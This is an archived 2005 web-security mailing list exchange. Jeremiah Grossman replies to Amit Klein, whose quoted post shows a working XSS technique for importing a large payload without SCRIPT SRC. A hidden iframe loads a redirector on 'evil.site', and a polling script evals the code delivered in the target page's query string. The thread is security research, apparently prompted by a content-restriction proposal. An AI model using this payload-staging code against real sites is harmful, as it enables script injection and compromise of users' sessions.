WebApp Sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [WEB SECURITY] Importing large code piece into Javascript context without SCRIPT SRC=...

From: Jeremiah Grossman <jeremiah () whitehatsec com>
Date: Fri, 14 Oct 2005 10:56:03 -0700
Admittedly, I was a bit confused by what your trying to achieve with code. So sticking the question at hand...
"Importing large code piece into Javascript context without SCRIPT SRC" ... I take to do not use the HTML syntax... <script src="http://foo/ file.js"></script> 

Here's an idea..

1) DOM Programming
var js = document.createElement('script');
js.setAttribute('src', 'http://foo/file.js&apos;);
document.body.appendChild(js);

* same effect, but different style.


This what you had in mind?


Regards,

Jeremiah-





On Oct 14, 2005, at 10:37 AM, Amit Klein (AKsecurity) wrote:


Hi
Recently, I've been toying with the somewhat academic question of whether it is possible to "import" a large piece of JS code (to be used as XSS payload), given that a script context is already available, BUT without using SCRIPT SRC=... This question is triggered by the "script" keyword of Gervase Markham's Content- Restrictions suggestion (http://www.gerv.net/ security/content-restrictions/).
I came up with a nice idea, which is abusing any manner of loading HTML content (such as IFRAME, new windows, etc.) as following: The attacker forces a load from its own website (evil.site), which redirects the browser back to the original website (say target.site). It needs to do so with a query (e.g. "?data=..."). This query is the channel through which the JS payload is transmitted to the malicious bridge-head. In the below example, assume that evil.site/redir.cgi simply redirects to target.site/ index.html?data=... Note that it may take few seconds for the target.site page to load, and meanwhile, the script (which runs in the target.site domain) cannot access the IFRAME (which initially is in evil.site domain). Hence the need for the loop. 

<iframe src="http://evil.site/redir.cgi"; width=1 height=1></iframe>
<script>
var tid;
function fetch()
{
      try
      {
            var data=document.frames[0].location.search.substr(6);
            clearInterval(tid);
            eval(data);
      }
      catch(ex)
      {
      }
}
tid = setInterval('fetch()', 100);
</script>
As you can see, with about 240 bytes, I can force a load of any script code through the query part, which can host 4KB. And it's easy to do this multiple times. 

-Amit
Previous By Date Next
Previous By Thread Next

Current thread: